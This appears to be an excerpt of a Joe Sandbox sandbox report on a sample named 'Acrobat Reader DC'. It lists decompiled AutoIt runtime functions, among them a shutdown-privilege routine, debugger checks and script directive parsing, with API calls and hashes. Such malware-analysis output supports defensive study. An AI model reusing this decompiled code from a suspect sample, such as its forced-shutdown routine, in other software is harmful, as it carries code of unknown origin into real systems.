                                  				_t29 = _a4;
                                  				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                  					L2:
                                  					return 0;
                                  				} else {
                                  					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
                                  					_v24.PrivilegeCount = 1;
                                  					_v12 = 2;
                                  					AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                  					if(GetLastError() == 0) {
                                  						if(_t29 == 0x20) {
                                  							return SetSystemPowerState(1, 0);
                                  						} else {
                                  							if(_t29 == 0x40) {
                                  								return SetSystemPowerState(0, 0);
                                  							} else {
                                  								if((_t29 & 0x0000000b) != 0) {
                                  									_t31 = 0;
                                  									if((_t29 & 0x00000014) != 0) {
                                  										_t31 = 1;
                                  									}
                                  									_t27 = 0;
                                  									if((_t29 & 0x00000002) != 0) {
                                  										_t27 = 1;
                                  									}
                                  									__imp__InitiateSystemShutdownExW(0, 0, 0, _t31, _t27, _a8);
                                  									return _t27;
                                  								} else {
                                  									return ExitWindowsEx(_t29, 0);
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}










                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                  • GetLastError.KERNEL32 ref: 00433414
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 2938487562-3733053543
                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0041A208(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                  				intOrPtr _v0;
                                  				void* _v804;
                                  				intOrPtr _v808;
                                  				intOrPtr _v812;
                                  				intOrPtr _t6;
                                  				intOrPtr _t12;
                                  				intOrPtr _t13;
                                  				long _t17;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t31;
                                  				void* _t34;
                                  
                                  				_t27 = __esi;
                                  				_t26 = __edi;
                                  				_t25 = __edx;
                                  				_t22 = __ecx;
                                  				_t21 = __ebx;
                                  				_t6 = __eax;
                                  				_t34 = _t22 -  *0x490d40; // 0x7c4adafd
                                  				if(_t34 == 0) {
                                  					asm("repe ret");
                                  				}
                                  				 *0x497278 = _t6;
                                  				 *0x497274 = _t22;
                                  				 *0x497270 = _t25;
                                  				 *0x49726c = _t21;
                                  				 *0x497268 = _t27;
                                  				 *0x497264 = _t26;
                                  				 *0x497290 = ss;
                                  				 *0x497284 = cs;
                                  				 *0x497260 = ds;
                                  				 *0x49725c = es;
                                  				 *0x497258 = fs;
                                  				 *0x497254 = gs;
                                  				asm("pushfd");
                                  				_pop( *0x497288);
                                  				 *0x49727c =  *_t31;
                                  				 *0x497280 = _v0;
                                  				 *0x49728c =  &_a4;
                                  				 *0x4971c8 = 0x10001;
                                  				 *0x49717c =  *0x497280;
                                  				 *0x497170 = 0xc0000409;
                                  				 *0x497174 = 1;
                                  				_t12 =  *0x490d40; // 0x7c4adafd
                                  				_v812 = _t12;
                                  				_t13 =  *0x490d44; // 0x83b52502
                                  				_v808 = _t13;
                                  				 *0x4971c0 = IsDebuggerPresent();
                                  				_push(1);
                                  				E0041FE19(_t14);
                                  				SetUnhandledExceptionFilter(0);
                                  				_t17 = UnhandledExceptionFilter("pqI");
                                  				if( *0x4971c0 == 0) {
                                  					_push(1);
                                  					E0041FE19(_t17);
                                  				}
                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                  			}



















                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: pqI
                                  • API String ID: 2579439406-2459173057
                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E004417BF(intOrPtr _a4, struct HWND__** _a8) {
                                  				signed int _v32;
                                  				long _v36;
                                  				struct tagRECT _v52;
                                  				struct tagRECT _v68;
                                  				void* _v72;
                                  				WCHAR* _v76;
                                  				struct HBRUSH__* _v80;
                                  				long _v84;
                                  				int _v88;
                                  				long _v92;
                                  				int _v96;
                                  				void* _v100;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t104;
                                  				long _t106;
                                  				long _t108;
                                  				long _t111;
                                  				void* _t113;
                                  				WCHAR* _t127;
                                  				struct HBRUSH__* _t160;
                                  				signed int _t168;
                                  				struct HWND__** _t169;
                                  				int _t170;
                                  				WCHAR* _t171;
                                  				signed int _t191;
                                  				struct HDC__* _t213;
                                  				intOrPtr _t217;
                                  				void* _t219;
                                  
                                  				_t217 = _a4;
                                  				if( *0x49751c == 0) {
                                  					_t104 =  *(_t217 + 0x10);
                                  					_t213 =  *(_t217 + 0x18);
                                  					_t168 = _t104 & 0x00000006;
                                  					_v52.right = _t104 & 0x00000010;
                                  					_v32 = _t168;
                                  					_v52.top.left = _t104 & 0x00000001;
                                  					__eflags = _t168;
                                  					if(_t168 == 0) {
                                  						_t106 = _a8[0x12];
                                  						__eflags = _t106 - 0xffffffff;
                                  						if(_t106 == 0xffffffff) {
                                  							_t106 = GetSysColor(0x12);
                                  							goto L6;
                                  						}
                                  					} else {
                                  						_t106 = GetSysColor(0xe);
                                  						L6:
                                  					}
                                  					_v52.top.left = SetTextColor(_t213, _t106);
                                  					_t108 = _a8[0x11];
                                  					__eflags = _t108 - 0xffffffff;
                                  					if(_t108 != 0xffffffff) {
                                  						_v68.top.left = CreateSolidBrush(_t108);
                                  						_t111 = _a8[0x11];
                                  					} else {
                                  						_v68.right.left = GetSysColorBrush(0xf);
                                  						_t111 = GetSysColor(0xf);
                                  					}
                                  					_v52.right = SetBkColor(_t213, _t111);
                                  					_t113 = SelectObject(_t213, _v72);
                                  					__eflags = _v76;
                                  					_v68.bottom = _t113;
                                  					_v52.top.left =  *(_t217 + 0x1c);
                                  					_v52.right =  *(_t217 + 0x20);
                                  					_v52.bottom =  *(_t217 + 0x24);
                                  					_v36 =  *(_t217 + 0x28);
                                  					if(_v76 == 0) {
                                  						__eflags = _v72;
                                  						if(_v72 != 0) {
                                  							InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
                                  						}
                                  						DrawFrameControl(_t213,  &(_v52.top), 4, 0x10);
                                  					} else {
                                  						InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
                                  						_t160 = CreateSolidBrush(GetSysColor(0x10));
                                  						_v68.left = _t160;
                                  						FrameRect(_t213,  &_v52, _t160);
                                  						DeleteObject(_v68.left);
                                  					}
                                  					__eflags = _v76;
                                  					_v52.top.left =  *(_t217 + 0x1c);
                                  					_v52.right =  *(_t217 + 0x20);
                                  					_v52.bottom =  *(_t217 + 0x24);
                                  					_v36 =  *(_t217 + 0x28);
                                  					if(_v76 == 0) {
                                  						__eflags = _v72;
                                  						if(_v72 == 0) {
                                  							InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
                                  						} else {
                                  							InflateRect( &(_v52.top), 0xfffffffd, 0xfffffffd);
                                  						}
                                  						_v52.top.left = _v52.top.left - 1;
                                  						_t51 =  &(_v52.right);
                                  						 *_t51 = _v52.right - 1;
                                  						__eflags =  *_t51;
                                  					} else {
                                  						InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
                                  					}
                                  					FillRect(_t213,  &(_v52.top), _v80);
                                  					__eflags = _v88;
                                  					if(_v88 != 0) {
                                  						L23:
                                  						_v68.right.left = _v68.right.left + 2;
                                  						_t58 =  &(_v68.bottom);
                                  						 *_t58 = _v68.bottom + 2;
                                  						__eflags =  *_t58;
                                  					} else {
                                  						__eflags = _t168;
                                  						if(_t168 != 0) {
                                  							goto L23;
                                  						}
                                  					}
                                  					_t169 = _a8;
                                  					_v88 = 0x105;
                                  					__eflags = GetWindowLongW( *_t169, 0xfffffff0) & 0x00002000;
                                  					if(__eflags == 0) {
                                  						_v88 = 0x125;
                                  					}
                                  					_t65 = SendMessageW( *_t169, 0xe, 0, 0) + 1; // 0x1
                                  					_t170 = _t65;
                                  					_push( ~(0 | __eflags > 0x00000000) | _t170 * 0x00000002);
                                  					_t127 = E004115D7(_t213, _t217, __eflags);
                                  					_v76 = _t127;
                                  					GetWindowTextW( *_a8, _t127, _t170);
                                  					_t171 = _v76;
                                  					DrawTextW(_t213, _t171, 0xffffffff,  &(_v68.right), _v88);
                                  					__eflags = _v72;
                                  					if(_v72 != 0) {
                                  						_v52.left =  *(_t217 + 0x24);
                                  						_t191 =  *(_t217 + 0x20) + 1;
                                  						__eflags = _t191;
                                  						_v52.top.left =  *(_t217 + 0x28);
                                  						_v68.right.left =  *(_t217 + 0x1c) + 1;
                                  						_v68.bottom = _t191;
                                  						SetTextColor(_t213, GetSysColor(0x11));
                                  						DrawTextW(_t213, _t171, 0xffffffff,  &_v68, _v96);
                                  					}
                                  					__eflags = _v84;
                                  					if(_v84 != 0) {
                                  						_v68.right.left =  *(_t217 + 0x1c);
                                  						_v68.bottom =  *(_t217 + 0x20);
                                  						_v52.left =  *(_t217 + 0x24);
                                  						_v52.top.left =  *(_t217 + 0x28);
                                  						_t219 = CreateSolidBrush(0);
                                  						FrameRect(_t213,  &(_v68.top), _t219);
                                  						DeleteObject(_t219);
                                  						InflateRect( &_v68, 0xfffffffc, 0xfffffffc);
                                  						DrawFocusRect(_t213,  &_v68);
                                  					}
                                  					_push(_t171);
                                  					E004111DC();
                                  					SelectObject(_t213, _v68);
                                  					DeleteObject(_v100);
                                  					SetTextColor(_t213, _v92);
                                  					SetBkColor(_t213, _v84);
                                  					return 1;
                                  				} else {
                                  					return E004308EF(_t217, _a8);
                                  				}
                                  			}

































                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                  • SelectObject.GDI32(?,?), ref: 00441874
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                  • FrameRect.USER32 ref: 004418CA
                                  • DeleteObject.GDI32(?), ref: 004418D5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                  • FillRect.USER32 ref: 00441970
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                  • String ID:
                                  • API String ID: 69173610-0
                                  • Opcode ID: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                  • Opcode Fuzzy Hash: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E00403A20(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                  				char _v8196;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int _t44;
                                  				intOrPtr _t45;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				intOrPtr _t49;
                                  				intOrPtr _t50;
                                  				intOrPtr _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				signed int _t65;
                                  				void* _t67;
                                  				intOrPtr _t68;
                                  				signed int _t72;
                                  				intOrPtr _t76;
                                  				signed int _t86;
                                  				char* _t96;
                                  				intOrPtr _t101;
                                  				void* _t116;
                                  				intOrPtr* _t117;
                                  				void* _t119;
                                  				short* _t120;
                                  				signed int _t121;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t124;
                                  				void* _t125;
                                  				void* _t126;
                                  				void* _t127;
                                  				void* _t128;
                                  				void* _t129;
                                  				void* _t130;
                                  
                                  				_t134 = __fp0;
                                  				_t98 = __ecx;
                                  				E00422240(0x2004);
                                  				_t120 = _a4;
                                  				if( *_t120 == 0x23) {
                                  					_t96 = __ecx;
                                  					_t44 = E0041341F(_t120, L"#notrayicon", 0xb);
                                  					_t124 = _t123 + 0xc;
                                  					__eflags = _t44;
                                  					if(_t44 != 0) {
                                  						_t45 = E0041341F(_t120, L"#requireadmin", 0xd);
                                  						_t125 = _t124 + 0xc;
                                  						__eflags = _t45;
                                  						if(_t45 != 0) {
                                  							_t46 = E0041341F(_t120, L"#NoAutoIt3Execute", 0xd);
                                  							_t126 = _t125 + 0xc;
                                  							__eflags = _t46;
                                  							if(_t46 != 0) {
                                  								_t47 = E0041341F(_t120, L"#OnAutoItStartRegister", 0x16);
                                  								_t127 = _t126 + 0xc;
                                  								__eflags = _t47;
                                  								if(__eflags != 0) {
                                  									_t48 = E0041341F(_t120, L"#include-once", 0xd);
                                  									_t128 = _t127 + 0xc;
                                  									__eflags = _t48;
                                  									if(_t48 != 0) {
                                  										_t49 = E0041341F(_t120, L"#include", 8);
                                  										_t129 = _t128 + 0xc;
                                  										__eflags = _t49;
                                  										if(_t49 != 0) {
                                  											_t50 = E0041341F(_t120, L"#comments-start", 0xf);
                                  											_t130 = _t129 + 0xc;
                                  											__eflags = _t50;
                                  											if(__eflags == 0) {
                                  												L28:
                                  												_t117 = _a12;
                                  												_a4 = 1;
                                  												while(1) {
                                  													__eflags = E0046FD6C(__eflags, _a16, _t120);
                                  													if(__eflags == 0) {
                                  														break;
                                  													}
                                  													 *_t117 =  *_t117 + 1;
                                  													E00444BBB(_t98, __eflags, _t120);
                                  													E00444B5F(_t98, _t120);
                                  													_t58 = E0041341F(_t120, L"#comments-start", 0xf);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t58;
                                  													if(__eflags == 0) {
                                  														L36:
                                  														_a4 = _a4 + 1;
                                  														continue;
                                  													}
                                  													_t59 = E0041341F(_t120, L"#cs", 3);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t59;
                                  													if(__eflags == 0) {
                                  														goto L36;
                                  													}
                                  													_t60 = E0041341F(_t120, L"#comments-end", 0xd);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t60;
                                  													if(_t60 == 0) {
                                  														L34:
                                  														_t62 = _a4 - 1;
                                  														_a4 = _t62;
                                  														__eflags = _t62;
                                  														if(__eflags > 0) {
                                  															continue;
                                  														}
                                  														return 1;
                                  													}
                                  													_t64 = E0041341F(_t120, L"#ce", 3);
                                  													_t130 = _t130 + 0xc;
                                  													__eflags = _t64;
                                  													if(__eflags != 0) {
                                  														continue;
                                  													}
                                  													goto L34;
                                  												}
                                  												__eflags = _a4;
                                  												if(__eflags <= 0) {
                                  													L5:
                                  													return 1;
                                  												}
                                  												E00454014(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
                                  												return 0;
                                  											}
                                  											_t65 = E0041341F(_t120, L"#cs", 3);
                                  											_t130 = _t130 + 0xc;
                                  											__eflags = _t65;
                                  											if(__eflags != 0) {
                                  												goto L5;
                                  											}
                                  											goto L28;
                                  										}
                                  										_push( &_v8196);
                                  										_push(_t120 + 0x10);
                                  										_push(_t96);
                                  										_t67 = E00444BFC();
                                  										_t101 = _a8;
                                  										__eflags = _t67 - 1;
                                  										_t68 =  *_a12;
                                  										if(__eflags != 0) {
                                  											E00454014(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
                                  											return 0;
                                  										}
                                  										_push(_t68);
                                  										_push(_t120);
                                  										_push(_t101);
                                  										_push(E00410190(_t96,  &_v8196, _t116));
                                  										_push( &_v8196);
                                  										_push(_t96);
                                  										_t72 = E004033C0( &_v8196, __fp0);
                                  										__eflags = _t72;
                                  										return 0 | _t72 != 0x00000000;
                                  									}
                                  									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
                                  									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
                                  										goto L5;
                                  									}
                                  									_t121 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_t76 = E004114AB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
                                  										_t128 = _t128 + 8;
                                  										__eflags = _t76;
                                  										if(_t76 == 0) {
                                  											break;
                                  										}
                                  										_t121 = _t121 + 1;
                                  										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
                                  										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
                                  											continue;
                                  										}
                                  										return 1;
                                  									}
                                  									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
                                  									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
                                  								}
                                  								_t122 = E00410160(_t120 + 0x2c, __eflags);
                                  								E00444B5F(_t98, _t122);
                                  								E00444BBB(_t98, __eflags, _t122);
                                  								_t86 = E004111C1(_t122);
                                  								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
                                  								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
                                  									_push(_t122);
                                  								} else {
                                  									_t8 = _t122 + 2; // 0x2
                                  									_t119 = _t8;
                                  									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
                                  									E00444B5F(0, _t119);
                                  									E00444BBB(0, __eflags, _t119);
                                  									_push(_t119);
                                  								}
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
                                  								_push(_t122);
                                  								E004111DC();
                                  								return 1;
                                  							}
                                  							 *((char*)(_t96 + 2)) = 1;
                                  							return 1;
                                  						}
                                  						 *((char*)(_t96 + 1)) = 1;
                                  						return 1;
                                  					}
                                  					 *_t96 = 1;
                                  					goto L5;
                                  				}
                                  				return 3;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 1038674560-3360698832
                                  • Opcode ID: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                  • Opcode Fuzzy Hash: b261e8f8160d560dbbfe57fd470195f13a8dd9f32e2a2a7dc38ee7de26995d9a
                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430737(signed int _a4) {
                                  				signed int _t4;
                                  
                                  				_t4 = _a4;
                                  				if(_t4 > 0x10) {
                                  					L16:
                                  					return SetCursor(LoadCursorW(0, 0x7f00));
                                  				} else {
                                  					switch( *((intOrPtr*)(_t4 * 4 +  &M004308AB))) {
                                  						case 0:
                                  							return SetCursor(LoadCursorW(0, 0x7f89));
                                  							goto L17;
                                  						case 1:
                                  							__eax = LoadCursorW(0, 0x7f8a);
                                  							return __eax;
                                  							goto L17;
                                  						case 2:
                                  							goto L16;
                                  						case 3:
                                  							__eax = LoadCursorW(0, 0x7f03);
                                  							return __eax;
                                  							goto L17;
                                  						case 4:
                                  							__eax = LoadCursorW(0, 0x7f8b);
                                  							return __eax;
                                  							goto L17;
                                  						case 5:
                                  							__eax = LoadCursorW(0, 0x7f01);
                                  							return __eax;
                                  							goto L17;
                                  						case 6:
                                  							__eax = LoadCursorW(0, 0x7f88);
                                  							return __eax;
                                  							goto L17;
                                  						case 7:
                                  							__eax = LoadCursorW(0, 0x7f86);
                                  							return __eax;
                                  							goto L17;
                                  						case 8:
                                  							__eax = LoadCursorW(0, 0x7f83);
                                  							return __eax;
                                  							goto L17;
                                  						case 9:
                                  							__eax = LoadCursorW(0, 0x7f85);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xa:
                                  							__eax = LoadCursorW(0, 0x7f82);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xb:
                                  							__eax = LoadCursorW(0, 0x7f84);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xc:
                                  							__eax = LoadCursorW(0, 0x7f04);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xd:
                                  							__eax = LoadCursorW(0, 0x7f02);
                                  							return __eax;
                                  							goto L17;
                                  						case 0xe:
                                  							return SetCursor(0);
                                  							goto L17;
                                  					}
                                  				}
                                  				L17:
                                  			}

                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                  • SetCursor.USER32(00000000), ref: 0043075B
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                  • SetCursor.USER32(00000000), ref: 00430773
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                  • SetCursor.USER32(00000000), ref: 0043078B
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                  • SetCursor.USER32(00000000), ref: 004307A3
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                  • SetCursor.USER32(00000000), ref: 004307BB
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                  • SetCursor.USER32(00000000), ref: 004307D3
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                  • SetCursor.USER32(00000000), ref: 004307EB
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                  • SetCursor.USER32(00000000), ref: 00430803
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                  • SetCursor.USER32(00000000), ref: 0043081B
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                  • SetCursor.USER32(00000000), ref: 00430833
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                  • SetCursor.USER32(00000000), ref: 0043084B
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                  • SetCursor.USER32(00000000), ref: 00430863
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                  • SetCursor.USER32(00000000), ref: 0043087B
                                  • SetCursor.USER32(00000000), ref: 00430887
